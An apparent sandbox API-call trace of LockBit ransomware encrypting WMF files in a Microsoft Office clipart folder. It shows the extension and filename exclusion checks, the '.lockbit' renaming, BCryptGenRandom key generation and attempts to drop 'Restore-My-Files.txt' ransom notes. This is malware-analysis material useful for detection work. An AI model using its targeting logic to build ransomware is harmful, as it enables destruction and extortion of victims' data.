[0152.986] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.986] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.987] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.987] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF.lockbit") returned 72 [0152.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230558.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.988] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.988] malloc (_Size=0x40068) returned 0x3df0008 [0152.988] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4198) returned 1 [0152.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.989] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.993] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.993] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.993] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.994] free (_Block=0x1fa2ed8) [0152.994] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.994] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.994] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x332a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232171.WMF", cAlternateFileName="")) returned 1 [0152.994] lstrcmpiW (lpString1=".", lpString2="J0232171.WMF") returned -1 [0152.995] lstrcmpiW (lpString1="..", lpString2="J0232171.WMF") returned -1 [0152.995] PathFindExtensionW (pszPath="J0232171.WMF") returned=".WMF" [0152.995] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.995] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.996] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.996] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232171.WMF") returned 1 [0152.997] lstrcmpiW (lpString1="ntldr", lpString2="J0232171.WMF") returned 1 [0152.997] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232171.WMF") returned 1 [0152.997] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232171.WMF") returned -1 [0152.997] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232171.WMF") returned -1 [0152.997] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232171.WMF") returned 1 [0152.997] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232171.WMF") returned -1 [0152.997] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.997] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF") returned=".WMF" [0152.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.997] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.997] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.998] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.998] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF.lockbit") returned 72 [0152.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232171.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.999] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.999] malloc (_Size=0x40068) returned 0x3e70008 [0152.999] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=13098) returned 1 [0152.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0153.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0153.000] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.005] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.005] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.006] free (_Block=0x1fa2ed8) [0153.006] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.006] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.006] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.006] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22d8c500, ftCreationTime.dwHighDateTime=0x1be1ff6, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22d8c500, ftLastWriteTime.dwHighDateTime=0x1be1ff6, nFileSizeHigh=0x0, nFileSizeLow=0x6bc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232393.WMF", cAlternateFileName="")) returned 1 [0153.006] lstrcmpiW (lpString1=".", lpString2="J0232393.WMF") returned -1 [0153.006] lstrcmpiW (lpString1="..", lpString2="J0232393.WMF") returned -1 [0153.006] PathFindExtensionW (pszPath="J0232393.WMF") returned=".WMF" [0153.006] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.006] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.007] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.008] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.008] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0232393.WMF") returned 1 [0153.008] lstrcmpiW (lpString1="ntldr", lpString2="J0232393.WMF") returned 1 [0153.009] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0232393.WMF") returned 1 [0153.009] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0232393.WMF") returned -1 [0153.009] lstrcmpiW (lpString1="autorun.inf", lpString2="J0232393.WMF") returned -1 [0153.009] lstrcmpiW (lpString1="thumbs.db", lpString2="J0232393.WMF") returned 1 [0153.009] lstrcmpiW (lpString1="iconcache.db", lpString2="J0232393.WMF") returned -1 [0153.009] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.009] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF") returned=".WMF" [0153.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.009] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.009] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.010] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.010] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF.lockbit") returned 72 [0153.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232393.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.011] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.011] malloc (_Size=0x40068) returned 0x3ef0008 [0153.011] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=27586) returned 1 [0153.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0153.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0153.012] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.017] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.017] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.018] free (_Block=0x1fa2ed8) [0153.018] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.018] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.018] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.018] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaa1c300, ftCreationTime.dwHighDateTime=0x1be1ff5, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcaa1c300, ftLastWriteTime.dwHighDateTime=0x1be1ff5, nFileSizeHigh=0x0, nFileSizeLow=0xa086, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0232395.WMF", cAlternateFileName="")) returned 1 [0153.018] lstrcmpiW (lpString1=".", lpString2="J0232395.WMF") returned -1 [0153.018] lstrcmpiW (lpString1="..", lpString2="J0232395.WMF") returned -1 [0153.018] PathFindExtensionW (pszPath="J0232395.WMF") returned=".WMF" [0153.018] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.018] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.018] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.019] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 